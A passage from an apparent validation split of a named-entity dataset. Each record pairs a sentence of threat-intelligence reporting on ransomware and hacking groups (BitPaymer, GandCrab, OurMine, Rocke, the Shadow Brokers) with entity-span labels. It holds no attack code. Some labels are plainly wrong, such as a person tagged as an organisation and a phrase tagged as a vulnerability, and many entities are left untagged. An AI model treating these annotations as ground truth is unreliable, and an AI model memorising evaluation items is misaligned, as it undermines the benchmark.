"dnrti_valid_000189", "source": "dnrti_valid"}} {"text": "The hackers also started tweeting a few samples of internal 
emails from the company .", "spans": {}, "info": {"id": "dnrti_valid_000190", "source": "dnrti_valid"}} {"text": "From a process and file perspective , Hermes and Ryuk target files in a similar fashion .", "spans": {}, "info": {"id": "dnrti_valid_000191", "source": "dnrti_valid"}} {"text": "Claudio Guarnieri , a security researcher who has investigated Hacking Team along with others at the Citizen Lab , was quick to point this out .", "spans": {"Organization: Claudio Guarnieri": [[0, 17]], "Organization: Citizen Lab": [[101, 112]]}, "info": {"id": "dnrti_valid_000192", "source": "dnrti_valid"}} {"text": "The breach on Hacking Team comes almost a year after another surveillance tech company , the competing FinFisher , was hacked in a similar way , with a hacker leaking 40 Gb of internal files .", "spans": {"Organization: FinFisher": [[103, 112]]}, "info": {"id": "dnrti_valid_000193", "source": "dnrti_valid"}} {"text": "Their software , once surreptitiously installed on a target 's cell phone or computer , can be used to monitor the target 's communications , such as phone calls , text messages , Skype calls , or emails .", "spans": {}, "info": {"id": "dnrti_valid_000194", "source": "dnrti_valid"}} {"text": "In 2015 and 2016 , Dridex was one of the most prolific eCrime banking trojans on the market and , since 2014 , those efforts are thought to have netted INDRIK SPIDER millions of dollars in criminal profits .", "spans": {}, "info": {"id": "dnrti_valid_000195", "source": "dnrti_valid"}} {"text": "In August 2017 , a new ransomware variant identified as BitPaymer was reported to have ransomed the U.K. 
's National Health Service ( NHS ) , with a high ransom demand of 53 BTC ( approximately $200,000 USD ) .", "spans": {}, "info": {"id": "dnrti_valid_000196", "source": "dnrti_valid"}} {"text": "The targeting of an organization rather than individuals , and the high ransom demands , made BitPaymer stand out from other contemporary ransomware at the time .", "spans": {}, "info": {"id": "dnrti_valid_000197", "source": "dnrti_valid"}} {"text": "Though the encryption and ransom functionality of BitPaymer was not technically sophisticated , the malware contained multiple anti-analysis features that overlapped with Dridex .", "spans": {}, "info": {"id": "dnrti_valid_000198", "source": "dnrti_valid"}} {"text": "Later technical analysis of BitPaymer indicated that it had been developed by INDRIK SPIDER , suggesting the group had expanded its criminal operation to include ransomware as a monetization strategy .", "spans": {}, "info": {"id": "dnrti_valid_000199", "source": "dnrti_valid"}} {"text": "The beginning of 2017 also brought a turning point in INDRIK SPIDER 's operation of Dridex .", "spans": {}, "info": {"id": "dnrti_valid_000200", "source": "dnrti_valid"}} {"text": "CrowdStrike® Falcon® Intelligence™ also observed a strong correlation between Dridex infections and BitPaymer ransomware .", "spans": {"Organization: CrowdStrike® Falcon® Intelligence™": [[0, 34]]}, "info": {"id": "dnrti_valid_000201", "source": "dnrti_valid"}} {"text": "During incidents that involved BitPaymer , Dridex was installed on the victim network prior to the deployment of the BitPaymer malware .", "spans": {}, "info": {"id": "dnrti_valid_000202", "source": "dnrti_valid"}} {"text": "Also unusual was the observation that both Dridex and BitPaymer were spread through the victim network using lateral movement techniques traditionally associated with nation-state actors and penetration testing .", "spans": {}, "info": {"id": "dnrti_valid_000203", "source": "dnrti_valid"}} {"text": "The information 
gathered from these engagements , combined with information from prior Dridex IR engagements , provides insight into how INDRIK SPIDER deploys and operates both Dridex and BitPaymer .", "spans": {}, "info": {"id": "dnrti_valid_000204", "source": "dnrti_valid"}} {"text": "In recent BitPaymer IR engagements , Falcon Intelligence linked the initial infection vector to fake updates for a FlashPlayer plugin and the Chrome web browser .", "spans": {"Organization: Falcon Intelligence": [[37, 56]]}, "info": {"id": "dnrti_valid_000205", "source": "dnrti_valid"}} {"text": "With the move to targeting select victims for high-value payouts , the INDRIK SPIDER adversary group is no longer forced to scale its operations , and now has the capacity to tailor its tooling to the victim 's environment and play a more active role in the compromise with \" hands on keyboard \" activity .", "spans": {}, "info": {"id": "dnrti_valid_000206", "source": "dnrti_valid"}} {"text": "This web hosting service provider continues to be the hosting provider of choice for the threat actors behind NetTraveler .", "spans": {"Organization: web hosting service provider": [[5, 33]], "Organization: hosting provider": [[54, 70]]}, "info": {"id": "dnrti_valid_000207", "source": "dnrti_valid"}} {"text": "These new tactics of selectively targeting organizations for high ransomware payouts have signaled a shift in INDRIK SPIDER 's operation with a new focus on targeted , low-volume , high-return criminal activity : a type of cybercrime operation we refer to as big game hunting .", "spans": {}, "info": {"id": "dnrti_valid_000208", "source": "dnrti_valid"}} {"text": "Later , in January 2018 , a report was released that identified similarities between the BitPaymer ransomware and Dridex malware .", "spans": {}, "info": {"id": "dnrti_valid_000209", "source": "dnrti_valid"}} {"text": "The report authors renamed the malware \" FriedEx \" .", "spans": {}, "info": {"id": "dnrti_valid_000210", "source": "dnrti_valid"}} 
{"text": "Falcon Intelligence has analyzed this malware and can confirm the overlap between BitPaymer/FriedEx and Dridex malware .", "spans": {"Organization: Falcon Intelligence": [[0, 19]]}, "info": {"id": "dnrti_valid_000211", "source": "dnrti_valid"}} {"text": "Though there is no functionality to collect this information in the ransomware itself , the ransomware is deployed by INDRIK SPIDER in parallel with Dridex malware , and the Dridex malware contains modules that may be used to collect information from infected hosts .", "spans": {}, "info": {"id": "dnrti_valid_000212", "source": "dnrti_valid"}} {"text": "Falcon Intelligence has acquired multiple decryption tools related to BitPaymer , which confirm the theory that a unique key is used for each infection .", "spans": {"Organization: Falcon Intelligence": [[0, 19]]}, "info": {"id": "dnrti_valid_000213", "source": "dnrti_valid"}} {"text": "Unlike many ransomware operations , which usually just require victims to make the payment and subsequently download a decryptor , INDRIK SPIDER requires the victim to engage in communication with an operator .", "spans": {}, "info": {"id": "dnrti_valid_000214", "source": "dnrti_valid"}} {"text": "Falcon Intelligence has had unique insight into the email dialogue between a victim and an INDRIK SPIDER operator .", "spans": {"Organization: Falcon Intelligence": [[0, 19]]}, "info": {"id": "dnrti_valid_000215", "source": "dnrti_valid"}} {"text": "Initial victim communication with the INDRIK SPIDER operator , using one of the email addresses provided , results in the operator providing key pieces of information up front , such as the BTC address and the ransom amount .", "spans": {}, "info": {"id": "dnrti_valid_000216", "source": "dnrti_valid"}} {"text": "It was made clear during communications that INDRIK SPIDER is not willing to negotiate on the ransom amount , explicitly stating that the victim can use multiple Bitcoin exchanges to obtain the number of BTC required , and the 
exchange rate should be calculated based on the rate posted on the cryptocurrency exchange Bittrex .", "spans": {}, "info": {"id": "dnrti_valid_000217", "source": "dnrti_valid"}} {"text": "Of note , INDRIK SPIDER specifies the geographical location of where the victim should seek help , confirming that they know key information about the victim .", "spans": {}, "info": {"id": "dnrti_valid_000218", "source": "dnrti_valid"}} {"text": "INDRIK SPIDER uses file sharing platforms to distribute the BitPaymer decryptor .", "spans": {}, "info": {"id": "dnrti_valid_000219", "source": "dnrti_valid"}} {"text": "In an extensive email to the victim , the INDRIK SPIDER operator provides a decryptor download link , decryptor deletion link ( to be used following decryptor download ) and a password .", "spans": {}, "info": {"id": "dnrti_valid_000220", "source": "dnrti_valid"}} {"text": "The recommendations provided are not only good advice , but also provide indications of how INDRIK SPIDER breaches organizations and moves laterally until domain controller access is gained .", "spans": {}, "info": {"id": "dnrti_valid_000221", "source": "dnrti_valid"}} {"text": "Ransom demands have varied significantly , suggesting that INDRIK SPIDER likely calculates the ransom amount based on the size and value of the victim organization .", "spans": {}, "info": {"id": "dnrti_valid_000222", "source": "dnrti_valid"}} {"text": "INDRIK SPIDER consists of experienced malware developers and operators who have likely been part of the group since the early days of Dridex operations , beginning in June 2014 .", "spans": {}, "info": {"id": "dnrti_valid_000223", "source": "dnrti_valid"}} {"text": "The formation of the group and the modus operandi changed significantly in early 2017 .", "spans": {}, "info": {"id": "dnrti_valid_000224", "source": "dnrti_valid"}} {"text": "Dridex operations became more targeted , resulting in less distribution and Dridex sub-botnets in operation , and BitPaymer ransomware 
operations began in July 2017 .", "spans": {}, "info": {"id": "dnrti_valid_000225", "source": "dnrti_valid"}} {"text": "There is no doubt that BitPaymer ransomware operations are proving successful for Indrik Spider , with an average estimated take of over $200,000 USD per victim , but it is also important to remember that INDRIK SPIDER continues to operate the Dridex banking trojan .", "spans": {}, "info": {"id": "dnrti_valid_000226", "source": "dnrti_valid"}} {"text": "There is no doubt that BitPaymer ransomware operations are proving successful for this criminal group , with an average estimated take of over $200,000 USD per victim , but it is also important to remember that INDRIK SPIDER continues to operate the Dridex banking trojan .", "spans": {}, "info": {"id": "dnrti_valid_000227", "source": "dnrti_valid"}} {"text": "Though Dridex is still bringing in criminal revenue for the actor after almost four years of operation , targeted wire fraud operations likely require lengthy planning .", "spans": {}, "info": {"id": "dnrti_valid_000228", "source": "dnrti_valid"}} {"text": "In scenarios where wire fraud is not as lucrative an option , INDRIK SPIDER might use ransomware to monetize the compromise instead .", "spans": {}, "info": {"id": "dnrti_valid_000229", "source": "dnrti_valid"}} {"text": "INDRIK SPIDER isn't the only criminal actor running big game hunting operations ; the first ransomware to stake a claim for big game hunting was Samas ( aka SamSam ) , which is developed and operated by BOSS SPIDER .", "spans": {}, "info": {"id": "dnrti_valid_000230", "source": "dnrti_valid"}} {"text": "Since they were first identified in January 2016 , this adversary has consistently targeted large organizations for high ransom demands .", "spans": {}, "info": {"id": "dnrti_valid_000231", "source": "dnrti_valid"}} {"text": "In July 2017 , INDRIK SPIDER joined the movement of targeted ransomware with BitPaymer .", "spans": {}, "info": {"id": "dnrti_valid_000232", "source": 
"dnrti_valid"}} {"text": "Most recently , the ransomware known as Ryuk came to market in August 2017 and has netted its operators , tracked by Falcon Intelligence as GRIM SPIDER , a significant ( and immediate ) profit in campaigns also targeting large organizations .", "spans": {"Organization: Falcon Intelligence": [[117, 136]]}, "info": {"id": "dnrti_valid_000233", "source": "dnrti_valid"}} {"text": "The LUNAR SPIDER threat group is the Eastern European-based operator and developer of the commodity banking malware called BokBot ( aka IcedID ) , which was first observed in April 2017 .", "spans": {}, "info": {"id": "dnrti_valid_000235", "source": "dnrti_valid"}} {"text": "The BokBot malware provides LUNAR SPIDER affiliates with a variety of capabilities to enable credential theft and wire fraud , through the use of webinjects and a malware distribution function .", "spans": {}, "info": {"id": "dnrti_valid_000236", "source": "dnrti_valid"}} {"text": "campaigns involving both BokBot and TrickBot were first identified by CrowdStrike Intelligence in July 2017 .", "spans": {"Organization: CrowdStrike Intelligence": [[70, 94]]}, "info": {"id": "dnrti_valid_000237", "source": "dnrti_valid"}} {"text": "These gtags have been closely associated with LUNAR SPIDER activity .", "spans": {}, "info": {"id": "dnrti_valid_000238", "source": "dnrti_valid"}} {"text": "Unit 42 followed network traces and pivoted on the information left behind by this actor , such as open directories , document metadata , and binary peculiarities , which enabled us to find a custom-made piece of malware , that we named \" CapturaTela \" .", "spans": {"Organization: Unit 42": [[0, 7]]}, "info": {"id": "dnrti_valid_000239", "source": "dnrti_valid"}} {"text": "Our telemetry for this campaign identified email as the primary delivery mechanism and found the first related samples were distributed in August 2018 .", "spans": {}, "info": {"id": "dnrti_valid_000240", "source": "dnrti_valid"}} {"text": "Aside 
from the use of the custom trojan CapturaTela , the actor makes extensive use of several other remote access Trojans to perform its malicious activities .", "spans": {}, "info": {"id": "dnrti_valid_000241", "source": "dnrti_valid"}} {"text": "Why would OurMine want to target WikiLeaks ?", "spans": {"Organization: WikiLeaks": [[33, 42]]}, "info": {"id": "dnrti_valid_000242", "source": "dnrti_valid"}} {"text": "Instead , OurMine had managed to alter WikiLeaks 's DNS records ( held by a third-party registrar ) to direct anyone who tried to visit wikileaks.org to visit a different IP address which definitely wasn't under the control of Julian Assange and his cronies .", "spans": {"Organization: WikiLeaks": [[39, 48]]}, "info": {"id": "dnrti_valid_000243", "source": "dnrti_valid"}} {"text": "We don't know how OurMine managed to access WikiLeaks 's DNS records , but past experience has shown that their typical modus operandi is simply to log in using their victim 's password .", "spans": {"Organization: WikiLeaks": [[44, 53]]}, "info": {"id": "dnrti_valid_000244", "source": "dnrti_valid"}} {"text": "Alternatively , OurMine might have used social engineering to trick WikiLeaks 's DNS provider into handing over the credentials , or simply requested that a password reset link be sent to a compromised email address .", "spans": {"Organization: WikiLeaks": [[68, 77]], "Organization: DNS provider": [[81, 93]]}, "info": {"id": "dnrti_valid_000245", "source": "dnrti_valid"}} {"text": "Alternatively , the attackers might have used social engineering to trick WikiLeaks 's DNS provider into handing over the credentials , or simply requested that a password reset link be sent to a compromised email address .", "spans": {"Organization: WikiLeaks": [[74, 83]], "Organization: DNS provider": [[87, 99]]}, "info": {"id": "dnrti_valid_000246", "source": "dnrti_valid"}} {"text": "Known for hijacking prominent social media accounts , the self-styled white hat hacking group OurMine took over 
a number of verified Twitter and Facebook accounts belonging to the cable network .", "spans": {"Organization: Twitter": [[133, 140]], "Organization: Facebook": [[145, 153]]}, "info": {"id": "dnrti_valid_000247", "source": "dnrti_valid"}} {"text": "Last year , OurMine victimized Marvel , The New York Times , and even the heads of some of the biggest technology companies in the world .", "spans": {"Organization: The New York Times": [[40, 58]], "Organization: technology companies": [[103, 123]]}, "info": {"id": "dnrti_valid_000248", "source": "dnrti_valid"}} {"text": "Mark Zuckerberg , Jack Dorsey , Sundar Pichai , and Daniel Ek — the CEOs of Facebook , Twitter , Google and Spotify , respectively — have also fallen victim to the hackers , dispelling the notion that a career in software and technology exempts one from being compromised .", "spans": {"Organization: Facebook": [[76, 84]], "Organization: Twitter": [[87, 94]], "Organization: Google": [[97, 103]]}, "info": {"id": "dnrti_valid_000249", "source": "dnrti_valid"}} {"text": "The group is well known : They hijacked WikiLeaks' DNS last month shortly after they took over HBO 's Twitter account ; last year , they took over Mark Zuckerberg 's Twitter and Pinterest accounts ; and they hit both BuzzFeed and TechCrunch not long after that .", "spans": {"Organization: WikiLeaks'": [[40, 50]], "Organization: Twitter": [[102, 109], [166, 173]], "Organization: Pinterest": [[178, 187]], "Organization: BuzzFeed": [[217, 225]], "Organization: TechCrunch": [[230, 240]]}, "info": {"id": "dnrti_valid_000250", "source": "dnrti_valid"}} {"text": "OurMine is well known : They hijacked WikiLeaks' DNS last month shortly after they took over HBO 's Twitter account ; last year , they took over Mark Zuckerberg 's Twitter and Pinterest accounts ; and they hit both BuzzFeed and TechCrunch not long after that .", "spans": {"Organization: WikiLeaks'": [[38, 48]], "Organization: Twitter": [[100, 107], [164, 171]], "Organization: Pinterest": 
[[176, 185]], "Organization: BuzzFeed": [[215, 223]], "Organization: TechCrunch": [[228, 238]]}, "info": {"id": "dnrti_valid_000251", "source": "dnrti_valid"}} {"text": "The group 's primary goal is demonstrating to companies that they have weak security .", "spans": {}, "info": {"id": "dnrti_valid_000252", "source": "dnrti_valid"}} {"text": "US intelligence agencies pinned the breach on North Korea ( one of the hacking group 's demands was that Sony pull The Interview , Seth Rogan 's comedy about a plot to assassinate Kim Jong-Un ) .", "spans": {"Organization: intelligence agencies": [[3, 24]], "Organization: Sony": [[105, 109]]}, "info": {"id": "dnrti_valid_000253", "source": "dnrti_valid"}} {"text": "Of course , Sony ( one of Vevo 's joint owners ) fell victim to a devastating hack in 2014 after a group of hackers calling themselves the \" Guardians of Peace \" dumped a wealth of its confidential data online .", "spans": {"Organization: Sony": [[12, 16]]}, "info": {"id": "dnrti_valid_000254", "source": "dnrti_valid"}} {"text": "The cryptominer employed by Pacha Group , labeled Linux.GreedyAntd by Intezer , was completely undetected by all leading engines , demonstrating the sophistication of this malware .", "spans": {"Organization: Intezer": [[70, 77]]}, "info": {"id": "dnrti_valid_000255", "source": "dnrti_valid"}} {"text": "Intezer has evidence dating back to September 2018 which shows Pacha Group has been using a cryptomining malware that has gone undetected on other engines .", "spans": {"Organization: Intezer": [[0, 7]]}, "info": {"id": "dnrti_valid_000256", "source": "dnrti_valid"}} {"text": "The new miner employed by Pacha Group , named Linux.GreedyAntd , has shown to be more sophisticated than the average Linux threat , using evasion techniques rarely seen in Linux malware .", "spans": {}, "info": {"id": "dnrti_valid_000257", "source": "dnrti_valid"}} {"text": "Pacha Group is believed to be of Chinese origin , and is actively delivering new campaigns , 
deploying a broad number of components , many of which are undetected and operating within compromised third party servers .", "spans": {}, "info": {"id": "dnrti_valid_000258", "source": "dnrti_valid"}} {"text": "We have labeled the undetected Linux.Antd variants , Linux.GreedyAntd and classified the threat actor as Pacha Group .", "spans": {}, "info": {"id": "dnrti_valid_000259", "source": "dnrti_valid"}} {"text": "Based on our findings Linux.GreedyAntd 's operations closely resemble previous cryptojacking campaigns deployed by Pacha Group in the past .", "spans": {}, "info": {"id": "dnrti_valid_000260", "source": "dnrti_valid"}} {"text": "Among the artifacts hosted in GreedyAntd 's servers , we managed to find a single component not related to the same cryptojacking operation just previously discussed and leveraged by Pacha Group .", "spans": {}, "info": {"id": "dnrti_valid_000261", "source": "dnrti_valid"}} {"text": "It was one of the few ransomware strains that were being mass-distributed via email spam and exploit kits , but also as part of targeted attacks against high-profile organizations ( a tactic known as big-game hunting ) at the same time .", "spans": {"Organization: high-profile organizations": [[153, 179]]}, "info": {"id": "dnrti_valid_000262", "source": "dnrti_valid"}} {"text": "The GandCrab author also had a spat with South Korean security vendor AhnLab last summer after the security firm released a vaccine for the GandCrab ransomware .", "spans": {"Organization: AhnLab": [[70, 76]], "Organization: security firm": [[99, 112]]}, "info": {"id": "dnrti_valid_000263", "source": "dnrti_valid"}} {"text": "Recently , Sophos Labs has observed criminal groups scanning the internet for open MySQL databases running on Windows systems , which they tried to infect with GandCrab .", "spans": {"Organization: Sophos Labs": [[11, 22]]}, "info": {"id": "dnrti_valid_000264", "source": "dnrti_valid"}} {"text": "CrowdStrike Intelligence has recently observed PINCHY 
SPIDER affiliates deploying GandCrab ransomware in enterprise environments , using lateral movement techniques and tooling commonly associated with nation-state adversary groups and penetration testing teams .", "spans": {"Organization: CrowdStrike Intelligence": [[0, 24]]}, "info": {"id": "dnrti_valid_000265", "source": "dnrti_valid"}} {"text": "Probably the most high-profile attack that GandCrab was behind is a series of infections at customers of remote IT support firms in the month of February .", "spans": {"Organization: customers": [[92, 101]], "Organization: IT support firms": [[112, 128]]}, "info": {"id": "dnrti_valid_000266", "source": "dnrti_valid"}} {"text": "CrowdStrike® Intelligence has recently observed PINCHY SPIDER affiliates deploying GandCrab ransomware in enterprise environments , using lateral movement techniques and tooling commonly associated with nation-state adversary groups and penetration testing teams .", "spans": {"Organization: CrowdStrike® Intelligence": [[0, 25]]}, "info": {"id": "dnrti_valid_000267", "source": "dnrti_valid"}} {"text": "PINCHY SPIDER is the criminal group behind the development of the ransomware most commonly known as GandCrab , which has been active since January 2018 .", "spans": {}, "info": {"id": "dnrti_valid_000268", "source": "dnrti_valid"}} {"text": "PINCHY SPIDER sells access to use GandCrab ransomware under a partnership program with a limited number of accounts .", "spans": {}, "info": {"id": "dnrti_valid_000269", "source": "dnrti_valid"}} {"text": "The main catalyst for dedicated development by PINCHY SPIDER , however , has been an ongoing battle with cybersecurity providers that are actively developing GandCrab mitigations and decryptors .", "spans": {"Organization: cybersecurity providers": [[105, 128]]}, "info": {"id": "dnrti_valid_000270", "source": "dnrti_valid"}} {"text": "In February , PINCHY SPIDER released version 5.2 of GandCrab , which is immune to the decryption tools developed for earlier 
versions of GandCrab and in fact , was deployed the day before the release of the latest decryptor .", "spans": {}, "info": {"id": "dnrti_valid_000271", "source": "dnrti_valid"}} {"text": "CrowdStrike Intelligence first identified new GandCrab ransomware deployment tactics in mid-February , when a threat actor was observed performing actions on a victim host in order to install GandCrab .", "spans": {"Organization: CrowdStrike Intelligence": [[0, 24]]}, "info": {"id": "dnrti_valid_000272", "source": "dnrti_valid"}} {"text": "Using RDP and stolen credentials from the initially compromised host , the threat actor then proceeded to move laterally around the victim network and was able to deploy GandCrab across several other hosts .", "spans": {}, "info": {"id": "dnrti_valid_000273", "source": "dnrti_valid"}} {"text": "Near the end of February , CrowdStrike Intelligence observed another incident in which similar manual lateral movement techniques were used to deploy GandCrab across multiple hosts in an enterprise .", "spans": {"Organization: CrowdStrike Intelligence": [[27, 51]]}, "info": {"id": "dnrti_valid_000274", "source": "dnrti_valid"}} {"text": "Once Domain Controller access was acquired , Pinchy Spider used the enterprise 's own IT systems management software , LANDesk , to deploy a loader to hosts across the enterprise .", "spans": {}, "info": {"id": "dnrti_valid_000275", "source": "dnrti_valid"}} {"text": "This loader , known as Phorpiex Downloader , is not specifically tied to GandCrab or PINCHY SPIDER , and it has previously been observed dropping other malware , such as Smoke Bot , Azorult , and XMRig .", "spans": {}, "info": {"id": "dnrti_valid_000276", "source": "dnrti_valid"}} {"text": "As reported in the CrowdStrike 2018 Global Threat Report , big game hunting was a trend that helped define the criminal threat landscape in 2018 .", "spans": {}, "info": {"id": "dnrti_valid_000277", "source": "dnrti_valid"}} {"text": "BOSS SPIDER used both enterprise and 
per-host pricing during their campaigns .", "spans": {}, "info": {"id": "dnrti_valid_000278", "source": "dnrti_valid"}} {"text": "Both INDRIK SPIDER ( with BitPaymer ransomware ) and GRIM SPIDER ( with Ryuk ransomware ) have made headlines with their high profile victims and ransom profits , demonstrating that big game hunting is a lucrative enterprise .", "spans": {}, "info": {"id": "dnrti_valid_000279", "source": "dnrti_valid"}} {"text": "Running successful big game hunting operations results in a higher average profit per victim , allowing adversaries like PINCHY SPIDER and their partners to increase their criminal revenue quickly .", "spans": {}, "info": {"id": "dnrti_valid_000280", "source": "dnrti_valid"}} {"text": "The threat actor Rocke was originally revealed by Talos in August of 2018 and many remarkable behaviors were disclosed in their blog post .", "spans": {"Organization: Talos": [[50, 55]]}, "info": {"id": "dnrti_valid_000281", "source": "dnrti_valid"}} {"text": "The family was suspected to be developed by the Iron cybercrime group and it's also associated with the Xbash malware we reported on in September of 2018 .", "spans": {}, "info": {"id": "dnrti_valid_000282", "source": "dnrti_valid"}} {"text": "The threat actor Rocke was first reported by Cisco Talos in late July 2018 .", "spans": {"Organization: Cisco Talos": [[45, 56]]}, "info": {"id": "dnrti_valid_000283", "source": "dnrti_valid"}} {"text": "The ultimate goal of this threat is to mine Monero cryptocurrency in compromised Linux machines .", "spans": {}, "info": {"id": "dnrti_valid_000284", "source": "dnrti_valid"}} {"text": "To deliver the malware to the victim machines , the Rocke group exploits vulnerabilities in Apache Struts 2 , Oracle WebLogic , and Adobe ColdFusion .", "spans": {"Vulnerability: Rocke group exploits vulnerabilities": [[52, 88]]}, "info": {"id": "dnrti_valid_000285", "source": "dnrti_valid"}} {"text": "Once the C2 connection is established , malware used by the Rocke 
group downloads shell script named as \" a7 \" to the victim machine .", "spans": {}, "info": {"id": "dnrti_valid_000286", "source": "dnrti_valid"}} {"text": "To be more specific , the malware uninstalls cloud security products by Alibaba Cloud and Tencent Cloud .", "spans": {}, "info": {"id": "dnrti_valid_000287", "source": "dnrti_valid"}} {"text": "Public cloud infrastructure is one of the main targets for Rocke .", "spans": {}, "info": {"id": "dnrti_valid_000288", "source": "dnrti_valid"}} {"text": "FortiGuard Labs has been monitoring a Linux coin mining campaign from \" Rocke \" – a malware threat group specializing in cryptomining .", "spans": {"Organization: FortiGuard Labs": [[0, 15]]}, "info": {"id": "dnrti_valid_000289", "source": "dnrti_valid"}} {"text": "The malicious bash script components of the malware are hosted in Pastebin , with the profile name \" SYSTEMTEN \" , which is very similar to previous names used by the \" Rocke \" threat group .", "spans": {}, "info": {"id": "dnrti_valid_000290", "source": "dnrti_valid"}} {"text": "However , around a month ago , Rocke started targeting systems that run Jenkins by attempting to exploit CVE-2018-1000861 and CVE-2019-1003000 .", "spans": {"Vulnerability: CVE-2018-1000861": [[105, 121]], "Vulnerability: CVE-2019-1003000": [[126, 142]]}, "info": {"id": "dnrti_valid_000291", "source": "dnrti_valid"}} {"text": "By utilizing a hook library , it is more complicated for users to manually detect and remove the infection from their systems , giving the threat actors more time to generate profit .", "spans": {}, "info": {"id": "dnrti_valid_000292", "source": "dnrti_valid"}} {"text": "The group also made it back into the news with the recent WannaCry ransomware that targeted computers around the globe ; it piggybacked on exploits revealed by the Shadow Brokers .", "spans": {}, "info": {"id": "dnrti_valid_000293", "source": "dnrti_valid"}} {"text": "A mysterious hacker or hackers going by the name \" The Shadow 
Brokers \" claims to have hacked a group linked to the NSA and dumped a bunch of its hacking tools .", "spans": {"Organization: NSA": [[116, 119]]}, "info": {"id": "dnrti_valid_000294", "source": "dnrti_valid"}} {"text": "The Shadow Brokers claimed to have hacked the Equation Group and stolen some of its hacking tools .", "spans": {}, "info": {"id": "dnrti_valid_000295", "source": "dnrti_valid"}} {"text": "The Shadow Brokers first emerged in August , when they posted links to a selection of NSA exploits and hacking tools onto Github and other websites .", "spans": {"Vulnerability: NSA exploits": [[86, 98]]}, "info": {"id": "dnrti_valid_000296", "source": "dnrti_valid"}} {"text": "The Shadow Brokers , the group that publicly dumped a cache of NSA hacking tools , appears to be back and ready to sell stolen material on an individual basis .", "spans": {}, "info": {"id": "dnrti_valid_000297", "source": "dnrti_valid"}} {"text": "Wh1sks estimated that , between June and early August , the Shadow Brokers have made up to $88,000 in an alternative cryptocurrency called Monero .", "spans": {"Organization: Wh1sks": [[0, 6]]}, "info": {"id": "dnrti_valid_000298", "source": "dnrti_valid"}} {"text": "Moreover , Wh1sks was able to find out the email addresses of five people who have subscribed to the Shadow Brokers' monthly dump service .", "spans": {"Organization: Wh1sks": [[11, 17]]}, "info": {"id": "dnrti_valid_000299", "source": "dnrti_valid"}} {"text": "Buried among this new treasure trove , there are several mentions of previously disclosed NSA top secret programs and software such as \" STRAITBIZARRE \" , used to control implants remotely , and \" JEEPFLEA \" , a project to hack the money transferring system SWIFT .", "spans": {"Organization: NSA": [[90, 93]]}, "info": {"id": "dnrti_valid_000300", "source": "dnrti_valid"}} {"text": "The Shadow Brokers have long claimed that the tools they release are from the \" Equation Group \" , the name of a government hacking group 
outed by Kaspersky Lab in 2015 , which is widely believed to be the NSA .", "spans": {"Organization: Kaspersky Lab": [[147, 160]], "Organization: NSA": [[206, 209]]}, "info": {"id": "dnrti_valid_000301", "source": "dnrti_valid"}} {"text": "Recently , FireEye released a great report on one of the more active groups , now known as APT30 .", "spans": {"Organization: FireEye": [[11, 18]]}, "info": {"id": "dnrti_valid_000302", "source": "dnrti_valid"}} {"text": "In addition , Kaspersky discovered that the Winnti group uses a popular backdoor known as PlugX which also has Chinese origins .", "spans": {"Organization: Kaspersky": [[14, 23]]}, "info": {"id": "dnrti_valid_000303", "source": "dnrti_valid"}} {"text": "Previous work published by security vendor FireEye in October 2014 suggests APT28 might be of Russian origin .", "spans": {"Organization: FireEye": [[43, 50]]}, "info": {"id": "dnrti_valid_000304", "source": "dnrti_valid"}} {"text": "After publishing our initial series of blogposts back in 2016 , Kaspersky has continued to track the ScarCruft threat actor .", "spans": {"Organization: Kaspersky": [[64, 73]]}, "info": {"id": "dnrti_valid_000305", "source": "dnrti_valid"}} {"text": "Based on the ScarCruft’s recent activities , Kaspersky strongly believes that this ScarCruft group is likely to continue to evolve .", "spans": {"Organization: Kaspersky": [[45, 54]]}, "info": {"id": "dnrti_valid_000306", "source": "dnrti_valid"}} {"text": "Kaspersky also discovered an interesting piece of rare malware created by this threat actor ScarCruft .", "spans": {"Organization: Kaspersky": [[0, 9]]}, "info": {"id": "dnrti_valid_000307", "source": "dnrti_valid"}} {"text": "Kaspersky witnessed the ScarCruft threat actor extensively testing a known public exploit during its preparation for the next campaign .", "spans": {"Organization: Kaspersky": [[0, 9]]}, "info": {"id": "dnrti_valid_000308", "source": "dnrti_valid"}} {"text": "Based on our telemetry , Kaspersky can reassemble 
ScarCruft’s binary infection procedure .", "spans": {"Organization: Kaspersky": [[25, 34]]}, "info": {"id": "dnrti_valid_000309", "source": "dnrti_valid"}} {"text": "In addition , Kaspersky analyzed the victims of this campaign and spotted an interesting overlap of this campaign with another APT actor known as DarkHotel .", "spans": {"Organization: Kaspersky": [[14, 23]]}, "info": {"id": "dnrti_valid_000310", "source": "dnrti_valid"}} {"text": "Secureworks researchers investigated activities associated with the BRONZE BUTLER (also known as Tick) threat group , which likely originates in the People .", "spans": {"Organization: Secureworks": [[0, 11]]}, "info": {"id": "dnrti_valid_000311", "source": "dnrti_valid"}} {"text": "However , an investigation by Symantec has found that Butterfly has been active since at least March 2012 and its attacks have not only continued to the present day , but have also increased in number .", "spans": {"Organization: Symantec": [[30, 38]]}, "info": {"id": "dnrti_valid_000312", "source": "dnrti_valid"}} {"text": "Talos assesses with high confidence that Group 123 was responsible for six campaigns .", "spans": {"Organization: Talos": [[0, 5]]}, "info": {"id": "dnrti_valid_000313", "source": "dnrti_valid"}} {"text": "Attacks launched by Scarlet Mimic were publicly exposed on 2013 in a Trend Micro report about the FakeM Trojan .", "spans": {"Organization: Trend Micro": [[69, 80]]}, "info": {"id": "dnrti_valid_000314", "source": "dnrti_valid"}} {"text": "Finally , Talos identified a 6th campaign that is also linked to Group 123 .", "spans": {"Organization: Talos": [[10, 15]]}, "info": {"id": "dnrti_valid_000315", "source": "dnrti_valid"}} {"text": "As Talos observed at the beginning of 2017 , Group 123 started a campaign corresponding with the new year in 2018 .", "spans": {"Organization: Talos": [[3, 8]]}, "info": {"id": "dnrti_valid_000316", "source": "dnrti_valid"}} {"text": "Last month , researchers at Kaspersky reported on a Lazarus 
